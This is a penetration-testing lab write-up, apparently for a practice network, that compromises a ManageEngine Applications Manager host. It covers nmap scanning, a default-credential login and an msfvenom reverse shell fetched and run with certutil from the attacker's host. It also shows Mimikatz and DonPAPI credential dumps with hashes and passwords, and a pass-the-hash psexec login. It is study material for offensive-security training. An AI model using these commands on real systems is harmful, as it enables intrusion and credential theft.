
2-Web SERVER

The Nmap scan of the host 192.168.250.95 reveals several open ports, including 135, 139, 445, 5001, 8443 and 12000, indicating various services are running, in particular ManageEngine Applications Manager. The document details a process for exploiting the ManageEngine software to gain SYSTEM access, including uploading a reverse shell and dumping credentials with tools like Mimikatz and DonPAPI. It ends with the retrieval of user credentials and NTLM hashes, which are then used to log back in with pass-the-hash.

Uploaded by mohamed

NMAP

Nmap scan report for 192.168.250.95
Host is up (0.071s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5001/tcp open commplex-link?
| fingerprint-strings:
| SIPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html; charset=ISO-8859-1
| Content-Length: 132
|_ MAINSERVER_RESPONSE:<serverinfo method="setserverinfo" mainserver="5001" webserver="44444" pxyname="192.168.45.195" startpage=""/>
8443/tcp open ssl/https-alt AppManager
|_http-server-header: AppManager
| http-methods:
|_ Supported Methods: GET POST
|_ssl-date: 2024-11-13T19:31:35+00:00; -7h00m01s from scanner time.
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Set-Cookie: JSESSIONID_APM_44444=1D6477020301B47504C3DA84CD87D18E; Path=/; Secure; HttpOnly
| Content-Type: text/html;charset=UTF-8
| Content-Length: 973
| Date: Wed, 13 Nov 2024 19:28:24 GMT
| Connection: close
| Server: AppManager
| <!DOCTYPE html>
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <html>
| <head>
| <title>Applications Manager</title>
| <link REL="SHORTCUT ICON" HREF="/favicon.ico">
| <!-- Includes commonstyle CSS and dynamic style sheet bases on user selection -->
| <link href="/images/commonstyle.css?rev=14440" rel="stylesheet" type="text/css">
| <link href="/images/newUI/newCommonstyle.css?rev=14260" rel="stylesheet" type="text/css">
| <link href="/images/Grey/style.css?rev=14030" rel="stylesheet" type="text/css">
| <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
| </head>
| <body bgcolor="#FFFFFF" leftmarg
| GetRequest:
| HTTP/1.1 200
| Set-Cookie: JSESSIONID_APM_44444=5D551CF82F7FA2F141581E18CA662899; Path=/; Secure; HttpOnly
| Accept-Ranges: bytes
| ETag: W/"261-1591621693000"
| Last-Modified: Mon, 08 Jun 2020 13:08:13 GMT
| Content-Type: text/html
| Content-Length: 261
| Date: Wed, 13 Nov 2024 19:28:24 GMT
| Connection: close
| Server: AppManager
| <!-- $Id$ -->
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
| <html>
| <head>
| <!-- This comment is for Instant Gratification to work applications.do -->
| <script>
| window.open("/webclient/common/jsp/home.jsp", "_top");
| </script>
| </head>
| </html>
| HTTPOptions:
| HTTP/1.1 403
| Set-Cookie: JSESSIONID_APM_44444=13F3D484AF1D497F2A4C55E5582FEDA1; Path=/; Secure; HttpOnly
| Cache-Control: private
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=UTF-8
| Content-Length: 1810
| Date: Wed, 13 Nov 2024 19:28:24 GMT
| Connection: close
| Server: AppManager
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <meta http-equiv="Content-Type" content="UTF-8">
| <!--$Id$-->
| <html>
| <head>
| <title>Applications Manager</title>
| <link REL="SHORTCUT ICON" HREF="/favicon.ico">
| </head>
| <body style="background-color:#fff;">
| <style type="text/css">
| #container-error
| border:1px solid #c1c1c1;
| background: #fff; font:11px Arial, Helvetica, sans-serif; width:90%; margin:80px;
| #header-error
| background: #ededed; line-height:18px;
| padding: 15px; color:#000; font-size:8px;
| #header-error h1
|_ margin: 0; color:#000;
| ssl-cert: Subject: commonName=APPLICATIONSMANAGER/organizationName=WebNMS/stateOrProvinceName=Pleasanton/countryName=US
| Issuer: commonName=APPLICATIONSMANAGER/organizationName=WebNMS/stateOrProvinceName=Pleasanton/countryName=US
| Public Key type: rsa
| Public Key bits: 2072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-02-27T11:03:03
| Not valid after: 2050-02-27T11:03:03
| MD5: 094c:a4e7:2020:ec73:1e9f:e5ed:e0ea:5939
|_SHA-1: 834c:a871:c377:20d8:49bd:73d4:0660:b8a8:9a6a:df17
|_http-favicon: Unknown favicon MD5: CF9934E74D25878ED70B430915D931ED
|_http-title: Site doesn't have a title (text/html).
12000/tcp open cce4x?

The host has several ports open. The interesting one is 8443, an HTTPS service whose Server header (AppManager), page title (Applications Manager) and cookie name (JSESSIONID_APM_44444) all point at ManageEngine Applications Manager; port 5001 is its main server, which even tells us the internal web server port (44444).
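As an added example (not code from the original write-up), here is how to turn the two banners above into a fingerprint: port 5001 answers with a MAINSERVER_RESPONSE XML naming the internal web server port and proxy host, and the 8443 response carries Server: AppManager plus a session cookie JSESSIONID_APM_<port> whose suffix is that same internal port. The two sample responses are constructed from the nmap fingerprint-strings shown above; nothing is fetched from the network.

```python
"""Fingerprint ManageEngine Applications Manager from raw probe responses.

Added example, not code from the original write-up. The two sample responses
are constructed from the nmap fingerprint-strings in the scan output.
"""
import re
from typing import Dict, Optional

# Constructed sample: what port 5001 returned to nmap's SIPOptions probe.
MAINSERVER_BANNER = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=ISO-8859-1\r\n"
    "Content-Length: 132\r\n"
    "\r\n"
    'MAINSERVER_RESPONSE:<serverinfo method="setserverinfo" mainserver="5001" '
    'webserver="44444" pxyname="192.168.45.195" startpage=""/>'
)

# Constructed sample: the port 8443 response to a plain GET /.
WEB_BANNER = (
    "HTTP/1.1 200\r\n"
    "Set-Cookie: JSESSIONID_APM_44444=5D551CF82F7FA2F141581E18CA662899; "
    "Path=/; Secure; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "Server: AppManager\r\n"
    "\r\n"
    '<script>window.open("/webclient/common/jsp/home.jsp", "_top");</script>'
)


def parse_headers(raw: str) -> Dict[str, str]:
    """Split an HTTP response into a lower-cased header dict (first value wins)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            k, v = line.split(":", 1)
            headers.setdefault(k.strip().lower(), v.strip())
    return headers


def parse_mainserver(raw: str) -> Optional[Dict[str, str]]:
    """Pull the attributes out of the MAINSERVER_RESPONSE XML served on port 5001."""
    m = re.search(r"MAINSERVER_RESPONSE:<serverinfo ([^>]*)/>", raw)
    if not m:
        return None
    return dict(re.findall(r'(\w+)="([^"]*)"', m.group(1)))


def fingerprint_appmanager(raw: str) -> Optional[dict]:
    """Identify Applications Manager from a web response.

    Two tells: the Server: AppManager header and the session cookie name
    JSESSIONID_APM_<port>, whose suffix is the internal web server port.
    """
    headers = parse_headers(raw)
    if headers.get("server", "").lower() != "appmanager":
        return None
    info: dict = {"product": "ManageEngine Applications Manager", "web_port": None}
    m = re.search(r"JSESSIONID_APM_(\d+)=", headers.get("set-cookie", ""))
    if m:
        info["web_port"] = int(m.group(1))
    if "/webclient/common/jsp/home.jsp" in raw:  # the login/home redirect target
        info["login_path"] = "/webclient/common/jsp/home.jsp"
    return info


if __name__ == "__main__":
    print(parse_mainserver(MAINSERVER_BANNER))
    print(fingerprint_appmanager(WEB_BANNER))
```

The value of the 5001 banner is that it is unauthenticated and names the internal web port and proxy host, so it is a cheap confirmation before touching the login page.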

HTTPS enumeration: port 8443


Access the dashboard
Logging in with the default credentials admin:admin gets us the dashboard, which identifies the product as Applications Manager from ManageEngine. If you want to know more about ManageEngine you can search Google, but in short: ManageEngine is a suite of IT management tools from Zoho Corporation designed to help businesses manage their IT infrastructure. It includes solutions for network monitoring, endpoint management, security, helpdesk and IT analytics, giving IT teams a central place to maintain and secure their systems.
Get a reverse shell
Applications Manager can execute programs on the host, so we use it to run our shell. Let's go.
Our scenario: upload a malicious file with a .bat extension.
Step 1: Admin --> Upload Files / Binaries (malicious files)
First we need to generate the shell with msfvenom.
Command

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.x.x lport=443 -b '\x00\x2f\x0a' -f exe -o update.exe

Second part: write the command that downloads and runs our shell, update.exe

certutil.exe -f -urlcache -split http://192.168.x.x/update.exe c:\windows\temp\update.exe && cmd.exe /c c:\windows\temp\update


Third part
The last step is to trigger the execution.

We now have SYSTEM permissions and could read the flag in c:\users\administrator\desktop, but we also want to dump all hashes and plaintext passwords on the system. We upload Mimikatz to the host and run DonPAPI against it from our own machine.
Dump hashes and plaintext passwords
Mimikatz

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 291290 (00000000:000471da)
Session : Interactive from 1
User Name : Administrator
Domain : SECURE
Logon Server : SECURE
Logon Time : 9/28/2024 12:31:58 AM
SID : S-1-5-21-3197578891-1085383791-1901100223-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SECURE
* NTLM : a51493b0b06e5e35f855245e71af1d14
* SHA1 : 02fb73dd0516da435ac4681bda9cbed3c128e1aa
tspkg :
wdigest :
* Username : Administrator
* Domain : SECURE
* Password : (null)
kerberos :
* Username : Administrator
* Domain : SECURE
* Password : (null)
ssp :
credman :
[00000000]
* Username : apache
* Domain : era.secura.local
* Password : New2Era4.!
cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 9/28/2024 12:31:54 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 74336 (00000000:00012260)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 9/28/2024 12:31:54 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SECURE$
* Domain : SECURA
* NTLM : 983e73c648db56f78e9dfb9698066734
* SHA1 : 8372b4560319480f2ea43971f77b4e4efc37497a
tspkg :
wdigest :
* Username : SECURE$
* Domain : SECURA
* Password : (null)
kerberos :
* Username : SECURE$
* Domain : secura.yzx
* Password : 17 e1 ba 59 b7 4e 94 1c 08 93 23 a1 bf 91 8c 8f a7 8a f6 18 9d a5 b1 84 c9 98 97 f8 30 24 3c e5 3a 21 96 8b 54
81 b8 56 9b de 53 19 ea a3 4c b7 eb 4e 03 d4 64 5b 4a ef 25 2c 4a 17 6e fd bc bc ff 2d 9e 8e 2a e1 67 f2 91 97 8a 92 b7 ad 77 31 5d ba
d8 80 f7 8d 83 52 b7 e4 f0 cc 37 56 bb f9 38 c0 7a cd 04 83 11 a2 69 90 b1 f8 06 d1 2d d4 e1 3e e1 1d b1 53 b2 d5 7d cb 48 ef 64 f5 f1
33 0c c2 c7 e5 6d 3f 0e f4 e5 66 96 05 9f 61 4e 12 fe 88 84 7e 69 93 85 3a c2 dc 56 0e fd 7e af 10 57 5f 7f f0 38 4f be e3 3a cb f7 cd
f5 6e d5 08 e0 57 14 ae fc 31 86 d7 e3 ef 80 42 78 ad c2 40 09 ea c0 c5 10 71 67 8b c2 7e c2 b3 72 9b 3b 66 6e 2c 66 76 03 2b 9d 7a da
d9 20 f5 2b 1a 9e d4 e2 53 2d a1 53 ac 81 86 ed 5a fa c4 6a fe 99 fa
ssp :
credman :
cloudap :

We dumped the Administrator NTLM hash (a51493b0b06e5e35f855245e71af1d14) and, from Credential Manager, obtained a new credential: apache:New2Era4.! for the domain era.secura.local. The long hex "password" under the SECURE$ kerberos entry is the machine account's random key, not a human password.

DonPAPI

donpapi collect -t 192.168.250.95 -u administrator -H :a51493b0b06e5e35f855245e71af1d14


[💀] [+] DonPAPI Version 2.0.1
[💀] [+] Output directory at /home/r00tv/.donpapi
[💀] [+] Loaded 1 targets
[💀] [+] Recover file available at /home/r00tv/.donpapi/recover/recover_1731565455
[192.168.250.95] [+] Starting gathering credz
[192.168.250.95] [+] Dumping SAM
[192.168.250.95] [$] [SAM] Got 4 accounts
[192.168.250.95] [+] Dumping LSA
[192.168.250.95] [+] Dumping User and Machine masterkeys
[192.168.250.95] [$] [DPAPI] Got 10 masterkeys
[192.168.250.95] [+] Dumping User Chromium Browsers
[192.168.250.95] [+] Dumping User and Machine Certificates
[192.168.250.95] [+] Dumping User and Machine Credential Manager
[192.168.250.95] [$] [CredMan] [SYSTEM] Domain:batch=TaskScheduler:Task:{9EF6DE59-80B5-40A1-993B-4C80A0A07233} - SECURE\Administrator:Reality2Show4!.?
[192.168.250.95] [+] Gathering recent files and desktop files
[192.168.250.95] [+] Dumping User Firefox Browser
[192.168.250.95] [+] Dumping MobaXterm credentials
[192.168.250.95] [+] Dumping MRemoteNg Passwords
[192.168.250.95] [+] Dumping User's RDCManager
[192.168.250.95] [+] Dumping SCCM Credentials
[192.168.250.95] [+] Dumping User and Machine Vaults
[192.168.250.95] [+] Dumping VNC Credentials
[192.168.250.95] [+] Dumping Wifi profiles
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Username        Password            NTLM hash
administrator   Reality2Show4!.?    a51493b0b06e5e35f855245e71af1d14
apache          New2Era4.!          --

Log in with the Administrator NTLM hash (pass-the-hash with psexec.py)

psexec.py administrator@192.168.250.95 -hashes :a51493b0b06e5e35f855245e71af1d14


Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 192.168.250.95.....
[*] Found writable share ADMIN$
[*] Uploading file zWLrgcrQ.exe
[*] Opening SVCManager on 192.168.250.95.....
[*] Creating service ywdO on 192.168.250.95.....
[*] Starting service ywdO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> hostname
secure

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>
